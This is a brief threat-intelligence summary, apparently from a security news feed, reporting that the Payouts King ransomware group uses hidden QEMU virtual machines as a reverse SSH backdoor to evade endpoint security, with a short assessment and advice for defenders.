Payouts King ransomware uses QEMU VMs to bypass endpoint security
Summary
The Payouts King ransomware group is employing a novel technique by using QEMU virtual machines as a reverse SSH backdoor. This allows them to operate hidden VMs on compromised systems, effectively evading detection by endpoint security solutions.
IFF Assessment
FOE
This represents a concerning development for defenders as it introduces a new evasion tactic that bypasses traditional endpoint security measures.
Defender Context
Defenders should be aware of this evolving ransomware tactic that leverages virtualization for stealth. This highlights the need for advanced threat hunting capabilities and potentially deeper inspection of system processes to detect unusual VM activity or unauthorized SSH tunnels.